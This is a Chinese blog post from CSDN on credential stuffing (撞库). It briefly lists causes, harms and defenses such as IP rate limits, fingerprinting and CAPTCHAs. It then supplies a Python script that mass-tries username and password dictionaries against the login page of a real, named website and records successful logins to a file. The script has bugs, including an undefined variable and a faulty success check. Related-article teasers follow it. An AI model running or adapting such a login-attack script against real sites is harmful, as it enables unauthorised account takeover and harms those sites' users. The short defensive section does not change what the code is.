Python 撞库与防御策略

最新推荐文章于 2024-07-16 16:01:09 发布
最新推荐文章于 2024-07-16 16:01:09 发布
阅读量2k 收藏 13
点赞数 1
分类专栏: Python 文章标签: Python 撞库 安全防御
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lewyu521/article/details/81869299
版权

Python 撞库
写在前面: 浅谈撞库防御策略
1. 撞库成功的原因是什么呢?

1.广大网络用户为了方便记忆,所有网站都使用同一套用户名和密码。

2.网站登录的安全措施不够。

2 撞库的危害是什么呢?

就企业而言保护用户的信息安全是基本责任之一,泄露用户信息会缺失公信力,损毁
公司品牌形象。

就个人而言小则骚扰电话天天有,大则个人财产不翼而飞。

3 撞库这么大的危害,作为企业和网站主应该如何防止撞库攻击呢?

通过上面的例子我们可以发现,阻止撞库登录就是要让黑客不能够使用脚本程序进行批
量登录。常用的方法有以下几种:

 *①限制同一个IP的请求次数和请求频率*

这是一种方法,但是由于IP代理的存在,作用也不是特别大。

*②使用cookie,flash cookie以及帆布指纹等方法*

目前也是有许多网站在使用这种策略,有一定的作用,但是也是可以被清除掉的。

③*添加验证码*

批量模拟登陆

import requests as req
import time
import re

#获取文件
def getdic(file):
        dic = open(file).read()
        diclist = dic.split("\n")
        return diclist

def writeFile(filename,text):
        fo = open(filename, "a+")
        fo.write(text+"\n");
        # 关闭打开的文件
        fo.close()

#撞库实际程序
def zhuangku(name,pwd):
        # {username} 替换{}中的内容为用户名
        newpwd = re.sub(r'{\w+}', name, pwd)
        url='http://www.nancheng.ccoo.cn/login/login.asp'  
        data={
                  'username' : name,
                  'password' : newpwd,
                  'k':'Sun Jul 17 2016 11:59:23 GMT+0800 (中国标准时间)40000'
            }
        headers = {}
        reqe = req.Session()
        s=reqe.post(url,data=data,headers=headers)
        return s.text

userlist  = getdic('dict/names_top500.txt')
passlist  = getdic('dict/password.txt')


lenmax_i=len(userlist)
lenmax_j = len(passlist)

for i in range(0,lenmax_i):
        for j in range(0,lenmax_j):
                name = userlist[i]
                passwd = passlist[j]
                res = zhuangku(name,pwd)
                if j == 10:
                    break
                else:
                    if res == 1:
                        print(name+passwd+"succsess") 
                        writeFile('/tmp/zhuangku.txt',name+passwd +'success')
                        break
                    else:
                        print (name+passwd+res)
                        #continue  
                    time.sleep(0.5)
print ("success")
lew-yu
关注
专栏目录
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
AI Agent: AI的下一个风口 从感知到行动的过程
程序员光剑
05-22 646
1. 背景介绍 1.1 AI发展历程:从感知到决策 人工智能(AI)的发展经历了漫长的历程,从早期的符号主义AI,到连接主义的兴起,再到如今深度学习的蓬勃发展,AI的能力不断提升。然而,传统的AI系统大多局限于感知层面,例如图像识别、语音识别等,缺乏自
京东金融撞库
皮皮王的专栏
08-02 1738
1.京东金融对提交的手机号进行了rsa和base64加密,都是使用了window对象进行了操作,而这个对象只在浏览器中有,node中没有。 2.上面那个都好说,无关紧要的window操作可以直接注释掉,rsa加密拿过来用就行,别报错就行,这里有一个 window.btoa(encryptedString(key, sendData.name, RSAAPP.PKCS1Padding, RS
撞库
summer942zjb的博客
01-18 540
撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户。很多用户在不同网站使用的是相同的帐号密码,因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址,这就可以理解为撞库攻击。[1] 撞库可采用大数据安全技术来防护,比如:用数据资产梳理发现敏感数据,使用数据库加密保护核心数据,使用数据库安全运维防运维人员撞库攻击等。 https://baike.baidu.com/item/%E6%92%9E%E5%BA%93/16480882 ...
深入浅出了解撞库攻击!
最新发布
weixin_51725318的博客
07-16 1109
深入浅出了解撞库攻击!
倾家荡产、隐私全无?独家揭秘撞库攻击!
热门推荐
02-01 13万+
1. 撞库的原理和危害 “撞库”(Credential Stuffing Attack)在网络安全中是一个古老的概念,按中文的字面意思解读,就是“碰撞数据库”的意思。“碰撞”意味着碰运气,即不一定能成功;而“数据库”中往往存储着大量敏感数据,比如我们登录一个网站所需要的用户名、密码,再比如手机号、身份证号等个人隐私信息。“撞库”在英文中的表述为 Credential Stuffing(密码嗅探),也非常直白的说明了撞库的主要场景:试图获取正确的账号/密码组合,大白话就是“盗号”。 现实中发生的撞库攻击主要是
浅谈撞库防御策略
weixin_34315665的博客
04-22 274
2014年12306遭遇撞库攻击,13万数据泄露;2015年乌云网上爆出网易邮箱过亿用户数据由于撞库泄露;数据泄露愈演愈烈,撞库登录成为网站的一大安全威胁,今天小编就和大家探讨一下如何才能够有效的防止撞库攻击。俗语知己知彼,百战不殆,小编在网上找了个撞库教程整理给大家看看,了解黑客是如何撞库的。 首先找到一个目标网站,随便输入一组用户名和...
Python——碰撞测试
surymy
11-30 7499
简单地说,碰撞测试指的是两个动画精灵何时接触或重叠。两个移动的东西相互碰到一起,这就是一个碰撞。
Python小游戏开发与游戏人工智能:设计和实现游戏AI,赋予游戏智能
Python凭借其易用性和丰富的库,已成为游戏开发中日益流行的选择。本章将介绍Python游戏开发的基础知识,包括: - **游戏引擎概述:**了解不同游戏引擎的类型,例如Pygame、Panda3D和Godot,以及它们的优缺点。 - *...
人工智能基础理论介绍和发展现状及未来趋势
程序员光剑
04-04 1557
人工智能(AI)是近年来科技界的热门话题之一,其发展历程复杂且迅速。当前,AI技术主要包括机器学习、深度学习、强化学习、迁移学习等若干核心技术。这些技术在理论和应用上各有侧重点,相互之间也存在诸多交叉和融合。本博文将深入探讨这些技术的原理、应用和挑战,提供全面系统的人工智能发展概览。人工智能的发展途径可以归纳为三大类:机器学习、深度学习和强化学习。三者的区别在于学习方式和应用场景。机器学习和深度学习主要是通过监督和无监督学习方式进行模型训练,而强化学习则通过试错和奖励机制进行智能决策。迁移学习是机器学习和深
揭秘Python小游戏开发:从入门到精通,掌握游戏开发核心技术
![揭秘Python小游戏开发:...- **游戏开发环境的搭建:**安装必要的库和工具,创建游戏开发项目。 - **游戏引擎和框架:**了解游戏引擎和框架的概念,并介绍一些常用的选项。 - **游戏对象和组件:**理解游戏对象和组件
网页邮箱撞库
12-13
口令字典,撞库参考 CTF的同学自取 大概有17MB ,多到不敢相信
什么是撞库
qq_44833342的博客
05-29 1020
目的是获得未经授权的访问权限。通常,黑客会使用暴力破解或字典攻击等方法来尝试不同的用户名和密码组合,直到找到正确的组合为止。撞库攻击通常针对的是弱密码保护的系统和网站。指尝试使用一个已知的用户名和密码组合来尝试登录到一个系统中。撞库是一种黑客技术,
python 撞库_python 脚本撞库国内“某榴”账号
weixin_32141253的博客
02-09 370
其实日常生活中我们的用户名和密码就那么几个,所以这给撞库带来了可能,本文主要给出python脚本撞库的一点粗浅代码。这里只讨论技术本生,代码中某榴的地址也已经改掉,避免被管理员误解禁言等发生,谢谢大家理解。代码如下:把代码放到某个文件夹里面,然后准备几个txt文档,文档以0-n的自然数命名,文件格式为:caopengyu,rQf7JaotOp+W7h12XgvpAg==,yamaoshixode@...
撞库介绍及个人信息保护
u013939918的博客
01-07 859
撞库实际上时一种带有侥幸心理的破解,认为你在各大平台上的密码时一样的,在破解了某一用户在某一平台的密码之后 拿着邮箱 手机号等信息去  各大平台上尝试。若成功均会被泄露 。所以正常情况下  各大平台对于用户 用户名的处理时一样的,但是对密码的加密规则是不一样的,会加入本网站的域名等一些区别于其他平台的信息,来增加破解者的难度 降低被破解的风险,    那么同时我们尽量避免将所有平台的密码设置成相
绒绒说安全:聊聊撞库那些事儿
wangluoanquan111的博客
01-04 954
撞库,是指黑客利用互联网上已经泄露的账号密码,在各大网站进行批量的自动登录,也可以理解为黑客拿着用户A网站的账号密码,到B/C/D/E等平台尝试登录的过程。
撞库是什么意思?与洗库和拖库有什么关系?
oldboyedu1的博客
03-03 3061
撞库黑客专用语又叫做扫存,是一种非常常见的黑客攻击方式,通过收集互联网已泄露的拖库信息,特别是注册用户的用户名和密码信息,生成对应的字典表。很多用户在不同网站使用的是相同的账号密码,因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址,这就可以理解为撞库攻击。撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登录其他网站后,得到一系列可以登录的用户。在取得大量的用户数据之后,黑客会通过一系列的技术手段清洗数据,并在黑市上将有价值的用户数据变现交易,通常被称作洗库。
撞库是什么?常见撞库方法有哪些?
oldboyedu1的博客
04-08 1716
从行为层面来识别和封禁,和上面一条一样,通过客户端植入sdk,收集用户在登录页面的交互行为,通过机器学习、大数据建模,训练出正常用户、异常用户的行为模型,在交互行为层面,将撞库的行为识别出来。用几个密码撞n个账号,这个的表象是,密码出现的频率会非常高,所以,可以统计一段时间内每个密码的错误次数,超过一定阈值时,这个密码在一段时间内禁止登录。IP封禁,如果一段时间内,单个IP地址,密码错误次数超过阈值,则禁止这个IP一段时间再登录,但是目前代理IP成本非常低,从IP层面来封禁作用非常有限。
python爬虫的库,python爬虫库介绍和初步实现
weixin_29449593的博客
03-26 224
一般使用python写爬虫,比较常用的有request库、beautifulsoup4 库和Scrapy框架,但是有一些区别: 像request库和beautifulsoup4 插件库可以用来写轻量级的爬虫,而 Scrapy是一套更加完善的爬虫框架,类似于在写java的时候使用原始的jdbc来操作数据库还是使用mybatis框架操作数据库一样,使用解析库比较请便,但是Scrapy框架更加完善。做爬...
Python NumPy库安装与基础使用教程
本篇文章详细介绍了Python的NumPy库的安装和基础使用方法。首先,通过pip包管理工具来安装NumPy和交互式shell工具ipython。NumPy的安装命令如下: 1. 使用sudo权限安装NumPy: ``` $ sudo pip install numpy ```...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值